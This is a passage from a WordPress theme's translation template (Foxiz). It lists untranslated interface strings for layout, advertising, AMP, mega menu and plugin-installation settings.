Columns" msgstr "" #: backend/configs.php:502 backend/mega-menu.php:49 backend/panels/header.php:131 msgid "3 Columns" msgstr "" #: backend/configs.php:503 backend/mega-menu.php:50 backend/panels/header.php:132 msgid "4 Columns" msgstr "" #: backend/configs.php:504 backend/mega-menu.php:51 backend/panels/header.php:133 msgid "5 Columns" msgstr "" #: backend/configs.php:505 msgid "6 Columns" msgstr "" #: backend/configs.php:506 msgid "7 Columns" msgstr "" #: backend/configs.php:525 msgid "No Gap" msgstr "" #: backend/configs.php:526 msgid "10px" msgstr "" #: backend/configs.php:527 msgid "14px" msgstr "" #: backend/configs.php:528 msgid "20px" msgstr "" #: backend/configs.php:529 msgid "30px" msgstr "" #: backend/configs.php:530 msgid "40px" msgstr "" #: backend/configs.php:531 msgid "50px" msgstr "" #: backend/configs.php:532 msgid "60px" msgstr "" #: backend/configs.php:533 msgid "70px" msgstr "" #: backend/configs.php:560 backend/panels/blog-pages.php:1452 #: backend/panels/blog-pages.php:1860 msgid "Numeric" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: backend/configs.php:562 backend/panels/bookmark.php:574 msgid "Load More (Ajax)" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/configs.php:584 msgid "Style 1 (Right Featured Image)" msgstr "" #: backend/configs.php:585 msgid "Style 2 (Background Image)" msgstr "" #: backend/configs.php:586 msgid "Style 3 (Minimalist)" msgstr "" #: backend/configs.php:608 msgid "Pattern Dotted" msgstr "" #: backend/configs.php:609 msgid "Pattern Dotted 2" msgstr "" #: backend/configs.php:610 msgid "Pattern Diagonal" msgstr "" #: backend/configs.php:611 msgid "Pattern Diagonal 2" msgstr "" #: backend/configs.php:612 msgid "Solid Light Gray" msgstr "" #: backend/configs.php:670 msgid "No Featured" msgstr "" #: backend/configs.php:842 msgid "Leaderboard (728x90)" msgstr "" #: backend/configs.php:843 msgid "Banner (468x60)" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:845 msgid "Button (125x125)" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr "" #: backend/configs.php:847 msgid "Wide Skyscraper (160x600)" msgstr "" #: backend/configs.php:848 msgid "Small Rectangle (180x150)" msgstr "" #: backend/configs.php:849 msgid "Vertical Banner (120 x 240)" msgstr "" #: backend/configs.php:850 msgid "Small Square (200x200)" msgstr "" #: backend/configs.php:851 msgid "Square (250x250)" msgstr "" #: backend/configs.php:852 msgid "Medium Rectangle (300x250)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: backend/configs.php:856 msgid "Mobile Banner (320x50)" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:858 msgid "Billboard (970x250)" msgstr "" #: backend/configs.php:859 msgid "Mobile Banner (320x100)" msgstr "" #: backend/configs.php:860 msgid "Mobile Friendly (300x100)" msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/configs.php:873 msgid "Background" msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/install-plugins.php:30 msgid "Elementor Website Builder" msgstr "" #: backend/install-plugins.php:43 msgid "Breadcrumb NavXT" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:72 #, php-format msgid "" "Sorry, but you do not have the correct permissions to install the %s plugin. Contact " "the administrator of this site for help on getting the plugin installed." msgstr "" #: backend/install-plugins.php:75 #, php-format msgid "" "Sorry, but you do not have the correct permissions to activate the %s plugin. Contact " "the administrator of this site for help on getting the plugin activated." msgstr "" #: backend/install-plugins.php:76 #, php-format msgid "" "The following plugin needs to be updated to its latest version to ensure maximum " "compatibility with Foxiz: %1$s." msgstr "" #: backend/install-plugins.php:77 #, php-format msgid "" "Sorry, but you do not have the correct permissions to update the %s plugin. Contact " "the administrator of this site for help on getting the plugin updated." msgstr "" #: backend/install-plugins.php:82 #, php-format msgid "All plugins installed and activated successfully. %s" msgstr "" #: backend/mega-menu.php:120 msgid "Category Mega Menu" msgstr "" #: backend/mega-menu.php:121 msgid "Display posts of this category." msgstr "" #: backend/mega-menu.php:124 backend/mega-menu.php:165 msgid "Mega Menu" msgstr "" #: backend/mega-menu.php:128 msgid "-Disable-" msgstr "" #: backend/mega-menu.php:135 msgid "Blog Listing Layout: " msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/mega-menu.php:146 msgid "Text Color Scheme: " msgstr "" #: backend/mega-menu.php:153 msgid "Dark Text" msgstr "" #: backend/mega-menu.php:156 backend/panels/footer.php:66 #: backend/panels/header-style.php:92 backend/panels/header-style.php:380 #: backend/panels/header-style.php:647 backend/panels/header.php:289 msgid "Light Text" msgstr "" #: backend/mega-menu.php:161 msgid "Column Mega Menu" msgstr "" #: backend/mega-menu.php:162 msgid "" "Assign this sidebar (Appearance > Widgets) as this mega menu. Each widget is added " "will be corresponding to a column." msgstr "" #: backend/mega-menu.php:181 backend/panels/blog-pages.php:1159 #: backend/panels/bookmark.php:602 backend/panels/header.php:126 msgid "Columns per Row" msgstr "" #: backend/mega-menu.php:184 msgid "- Select Columns -" msgstr "" #: backend/mega-menu.php:197 msgid "or Ruby Templates Shortcode" msgstr "" #: backend/mega-menu.php:198 msgid "This setting will override on above settings." msgstr "" #: backend/mega-menu.php:200 backend/panels/blog-pages.php:119 #: backend/panels/single-post.php:1402 msgid "Template Shortcode" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set to full " "width." msgstr "" #: backend/mega-menu.php:210 msgid "Navigation Sub Label" msgstr "" #: backend/mega-menu.php:211 msgid "Display a sub label after this navigation label." msgstr "" #: backend/mega-menu.php:214 msgid "Sub Label" msgstr "" #: backend/mega-menu.php:218 msgid "Color" msgstr "" #: backend/mega-menu.php:222 msgid "Background color" msgstr "" #: backend/mega-menu.php:226 msgid "Dark Mode - Color" msgstr "" #: backend/mega-menu.php:230 backend/panels/header.php:698 backend/panels/privacy.php:56 msgid "Dark Mode - Background Color" msgstr "" #: backend/mega-menu.php:234 msgid "Menu Icon" msgstr "" #: backend/mega-menu.php:235 msgid "" "Display a icon before this menu item label. You can choose font icon or custom " "attachment image/SVG." msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design > Font " "Awesome\" if you use this font icon classname." msgstr "" #: backend/mega-menu.php:242 msgid "or Attachment/SVG Icon" msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/mega-menu.php:245 msgid "Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:249 msgid "Dark Mode - Attachment/SVG URL" msgstr "" #: backend/mega-menu.php:288 includes/fallbacks.php:274 msgid "Manage Locations" msgstr "" #: backend/panels/adblock.php:13 backend/panels/adblock.php:19 msgid "AdBlock Detector" msgstr "" #: backend/panels/adblock.php:14 msgid "" "Detecting most of the AdBlock extensions and show a popup to disable the extension." msgstr "" #: backend/panels/adblock.php:20 msgid "Enable or disable the adblock detector." msgstr "" #: backend/panels/adblock.php:26 backend/panels/newsletter.php:34 msgid "Title" msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/adblock.php:29 msgid "AdBlock Detected" msgstr "" #: backend/panels/adblock.php:33 backend/panels/blog-pages.php:2411 #: backend/panels/newsletter.php:41 woocommerce/single-product/tabs/description.php:24 msgid "Description" msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/adblock.php:35 msgid "Our site is an advertising supported site. Please whitelist to support our site." msgstr "" #: backend/panels/ads.php:15 msgid "Ads & Slide Up" msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/ads.php:30 msgid "Adsense - Auto Ads" msgstr "" #: backend/panels/ads.php:31 msgid "" "Auto ads will scan your site and automatically place ads where they are likely to " "perform well and potentially generate more revenue." msgstr "" #: backend/panels/ads.php:39 msgid "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/ads.php:45 msgid "Do not place more than one auto ads code in the website." msgstr "" #: backend/panels/ads.php:49 msgid "Auto Adsense Ads Code" msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/ads.php:53 msgid "Leave this option blank to use unit ads code." msgstr "" #: backend/panels/ads.php:59 msgid "Disable on Woocommerce Pages" msgstr "" #: backend/panels/ads.php:60 msgid "Disable auto Adsense on Woocommerce such as shop, product, cart, checkout...." msgstr "" #: backend/panels/ads.php:77 backend/panels/privacy.php:25 msgid "Top Site" msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:86 msgid "" "This section supports ads in the top header website. For other ad spots, please read " "the theme documentation for further info." msgstr "" #: backend/panels/ads.php:92 backend/panels/ads.php:97 backend/panels/ads.php:280 #: backend/panels/ads.php:285 msgid "Ad Type" msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:102 backend/panels/ads.php:291 msgid "Custom Image" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/ads.php:117 backend/panels/ads.php:306 msgid "The settings below will apply if you choose the \"Script\" ad type." msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/ads.php:124 backend/panels/ads.php:313 msgid "Use Adsense units code to ensure it display exactly where you put." msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/ads.php:134 backend/panels/ads.php:323 msgid "Do not Override" msgstr "" #: backend/panels/ads.php:135 backend/panels/ads.php:324 msgid "Custom Size Below" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:173 backend/panels/ads.php:362 msgid "Custom Image Settings" msgstr "" #: backend/panels/ads.php:174 backend/panels/ads.php:363 msgid "The settings below will apply if you choose the \"Custom Image\" ad type." msgstr "" #: backend/panels/ads.php:179 backend/panels/ads.php:368 msgid "Custom Image - Ad Image" msgstr "" #: backend/panels/ads.php:180 backend/panels/ads.php:369 msgid "Upload your ad image." msgstr "" #: backend/panels/ads.php:186 backend/panels/ads.php:375 msgid "Custom Image - Dark Mode Ad Image" msgstr "" #: backend/panels/ads.php:187 backend/panels/ads.php:376 msgid "Upload your ad image in the dark mode." msgstr "" #: backend/panels/ads.php:193 backend/panels/ads.php:382 msgid "Custom Image - Ad Destination" msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:200 backend/panels/ads.php:389 msgid "Custom Image - Max Width" msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/ads.php:215 backend/panels/ads.php:404 msgid "Style Settings" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:229 msgid "Dark Mode - Section Background" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:237 msgid "Spacing" msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/panels/ads.php:241 msgid "15px" msgstr "" #: backend/panels/ads.php:242 msgid "No spacing" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:274 msgid "" "This section supports ads inside single post content, after x paragraphs. For other ad " "spots, please read the theme documentation for further info." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/ads.php:409 msgid "Ad Description" msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/ads.php:412 msgid "- Advertisement -" msgstr "" #: backend/panels/ads.php:416 msgid "Ad Align" msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid "Float Right" msgstr "" #: backend/panels/ads.php:428 backend/panels/amp.php:588 msgid "Display Positions" msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/ads.php:430 backend/panels/amp.php:590 msgid "Allow multiple positions, separated by commas. For example: 4,9" msgstr "" #: backend/panels/ads.php:432 msgid "4,9" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/ads.php:463 msgid "Enable or disable the footer slide up section." msgstr "" #: backend/panels/ads.php:469 msgid "Slide Up Template Shortcode" msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in this " "section." msgstr "" #: backend/panels/ads.php:471 backend/panels/blog-pages.php:63 #: backend/panels/blog-pages.php:629 backend/panels/blog-pages.php:1947 #: backend/panels/footer.php:121 backend/panels/header.php:62 msgid "[Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/ads.php:478 backend/panels/newsletter.php:78 msgid "The period to redisplay the popup when visitors closed it." msgstr "" #: backend/panels/ads.php:480 backend/panels/newsletter.php:80 msgid "1 Day" msgstr "" #: backend/panels/ads.php:481 backend/panels/newsletter.php:81 msgid "2 Days" msgstr "" #: backend/panels/ads.php:482 backend/panels/newsletter.php:82 msgid "3 Days" msgstr "" #: backend/panels/ads.php:483 backend/panels/newsletter.php:83 msgid "1 Week" msgstr "" #: backend/panels/ads.php:484 backend/panels/newsletter.php:84 msgid "2 Weeks" msgstr "" #: backend/panels/ads.php:485 backend/panels/newsletter.php:85 msgid "3 Weeks" msgstr "" #: backend/panels/ads.php:486 backend/panels/newsletter.php:86 msgid "1 Month" msgstr "" #: backend/panels/ads.php:487 msgid "Always Display" msgstr "" #: backend/panels/ads.php:494 backend/panels/newsletter.php:111 msgid "Delay Time" msgstr "" #: backend/panels/ads.php:495 msgid "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/ads.php:500 msgid "Slide Up Background" msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/ads.php:506 msgid "Dark Mode - Slide Up Background" msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:512 msgid "Button Text Color" msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:520 msgid "Dark Mode - Button Text Color" msgstr "" #: backend/panels/ads.php:521 msgid "Select a color for the slide up toggle button when activated in the dark mode." msgstr "" #: backend/panels/ads.php:528 msgid "Not Activate - Button Text Color" msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/ads.php:536 msgid "Not Activate - Button Background" msgstr "" #: backend/panels/ads.php:537 msgid "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/amp.php:15 msgid "" "The AMP plugin not found! Accelerated Mobile Pages support, Please install and " "activate Automattic AMP plugin to activate settings below." msgstr "" #: backend/panels/amp.php:28 msgid "AMP" msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 backend/panels/general.php:10 #: backend/panels/header.php:31 backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/amp.php:50 msgid "" "Each AMP page has a 75,000 byte CSS limit. Foxiz will support a compact footer to " "ensure your website will meet with this requirement." msgstr "" #: backend/panels/amp.php:56 msgid "Debug Mode" msgstr "" #: backend/panels/amp.php:62 msgid "AMP Debug" msgstr "" #: backend/panels/amp.php:63 msgid "" "Debug mode will provide more information about the each AMP page such as CSS usages, " "plugin scripts etc..." msgstr "" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: backend/panels/amp.php:83 msgid "amp_footer Settings" msgstr "" #: backend/panels/amp.php:91 msgid "AMP Footer Logo" msgstr "" #: backend/panels/amp.php:92 msgid "Upload AMP footer logo." msgstr "" #: backend/panels/amp.php:97 backend/panels/footer.php:158 msgid "Logo Height" msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 50px." msgstr "" #: backend/panels/amp.php:103 backend/panels/footer.php:164 #: backend/panels/header-style.php:36 backend/panels/header-style.php:330 #: backend/panels/header-style.php:581 msgid "Social Icons" msgstr "" #: backend/panels/amp.php:104 backend/panels/footer.php:165 msgid "Enable or disable the social list in this section." msgstr "" #: backend/panels/amp.php:110 backend/panels/footer.php:171 msgid "Centered Mode" msgstr "" #: backend/panels/amp.php:111 backend/panels/footer.php:172 msgid "Centering this section." msgstr "" #: backend/panels/amp.php:124 backend/panels/amp.php:130 backend/panels/footer.php:185 msgid "Copyright Section" msgstr "" #: backend/panels/amp.php:131 msgid "Enable or disable the footer copyright section." msgstr "" #: backend/panels/amp.php:132 msgid "To setup the copyright area, Please navigate to Footer > Copyright Section." msgstr "" #: backend/panels/amp.php:145 backend/panels/amp.php:151 backend/panels/general.php:25 msgid "Back to Top" msgstr "" #: backend/panels/amp.php:152 backend/panels/general.php:26 msgid "Enable or disable the back to top button." msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:181 msgid "" "Each AMP page has a 75,000 byte CSS limit, turn off unnecessary section will increase " "the AMP performance." msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: backend/panels/amp.php:187 backend/panels/amp.php:196 backend/panels/amp.php:205 #: backend/panels/amp.php:223 backend/panels/amp.php:232 msgid "Default from Single Settings" msgstr "" #: backend/panels/amp.php:188 backend/panels/amp.php:197 backend/panels/amp.php:206 #: backend/panels/amp.php:215 backend/panels/amp.php:224 backend/panels/amp.php:233 msgid "Disable on AMP" msgstr "" #: backend/panels/amp.php:189 backend/panels/amp.php:198 msgid "Disable the Author Card in the AMP mode." msgstr "" #: backend/panels/amp.php:195 backend/panels/single-post.php:383 msgid "Author Card" msgstr "" #: backend/panels/amp.php:204 msgid "Next/Prev Articles" msgstr "" #: backend/panels/amp.php:207 msgid "Disable the Next/Prev Articles section in the AMP mode." msgstr "" #: backend/panels/amp.php:213 msgid "Comment Box" msgstr "" #: backend/panels/amp.php:214 backend/panels/blog-pages.php:49 #: backend/panels/blog-pages.php:615 backend/panels/blog-pages.php:1933 #: backend/panels/design.php:676 backend/single-metaboxes.php:146 #: backend/single-metaboxes.php:157 backend/single-metaboxes.php:923 #: backend/single-metaboxes.php:934 msgid "Default" msgstr "" #: backend/panels/amp.php:216 msgid "Disable comment form on AMP site." msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/amp.php:225 msgid "Disable the related section in the AMP mode." msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/amp.php:234 msgid "Disable the single post sidebar section in the AMP mode." msgstr "" #: backend/panels/amp.php:247 msgid "AMP Auto Ads" msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:257 msgid "" "Auto ads for AMP automatically place AdSense Auto ads on your AMP pages. Google will " "automatically show ads on your AMP pages at optimal times when they are likely to " "perform well and provide a good experience." msgstr "" #: backend/panels/amp.php:261 msgid "AMP Auto Ads Code" msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:277 msgid "AMP Ads" msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:287 msgid "Leave blank AMP auto ads if you would like to use the ad units." msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:303 backend/panels/amp.php:363 backend/panels/amp.php:423 #: backend/panels/amp.php:484 backend/panels/amp.php:544 msgid "-- Adsense --" msgstr "" #: backend/panels/amp.php:304 backend/panels/amp.php:364 backend/panels/amp.php:424 #: backend/panels/amp.php:485 backend/panels/amp.php:545 msgid "AMP Custom Script Ad" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 backend/panels/amp.php:433 #: backend/panels/amp.php:494 backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 backend/panels/amp.php:441 #: backend/panels/amp.php:502 backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 backend/panels/amp.php:449 #: backend/panels/amp.php:510 backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/amp.php:331 backend/panels/amp.php:391 backend/panels/amp.php:451 #: backend/panels/amp.php:512 backend/panels/amp.php:572 msgid "-- Responsive --" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 backend/panels/amp.php:452 #: backend/panels/amp.php:513 backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 backend/panels/amp.php:461 #: backend/panels/amp.php:522 backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:414 msgid "Top Single Content Ad Settings" msgstr "" #: backend/panels/amp.php:420 msgid "Top - Ad Type" msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/panels/amp.php:432 msgid "Top - Data Ad Client" msgstr "" #: backend/panels/amp.php:440 msgid "Top - Data Ad Slot" msgstr "" #: backend/panels/amp.php:448 msgid "Top - Adsense Size" msgstr "" #: backend/panels/amp.php:460 msgid "Top - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:475 msgid "Bottom Single Content Ad Settings" msgstr "" #: backend/panels/amp.php:481 msgid "Bottom - Ad Type" msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:493 msgid "Bottom - Data Ad Client" msgstr "" #: backend/panels/amp.php:501 msgid "Bottom - Data Ad Slot" msgstr "" #: backend/panels/amp.php:509 msgid "Bottom - Adsense Size" msgstr "" #: backend/panels/amp.php:521 msgid "Bottom - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/block-classic.php:20 msgid "" "These are settings for the Classic (standard) layout. It will be overridden by the " "\"Block Design\" (for Elementor pages) and \"Blog Design\" (for the Blog and Archive " "pages)." msgstr "" #: backend/panels/block-classic.php:27 msgid "classic" msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/block-classic.php:51 backend/panels/block-grid.php:51 #: backend/panels/block-grid.php:216 backend/panels/block-grid.php:381 #: backend/panels/block-grid.php:554 backend/panels/block-grid.php:741 #: backend/panels/block-list.php:59 backend/panels/block-list.php:232 #: backend/panels/block-list.php:413 backend/panels/block-list.php:608 #: backend/panels/blog-pages.php:385 backend/panels/blog-pages.php:872 #: backend/panels/blog-pages.php:1286 backend/panels/blog-pages.php:1694 #: backend/panels/blog-pages.php:2186 backend/panels/bookmark.php:284 #: backend/panels/bookmark.php:732 msgid "" "Organize how you want the entry meta to appear. Leave blank to set it as the default." msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 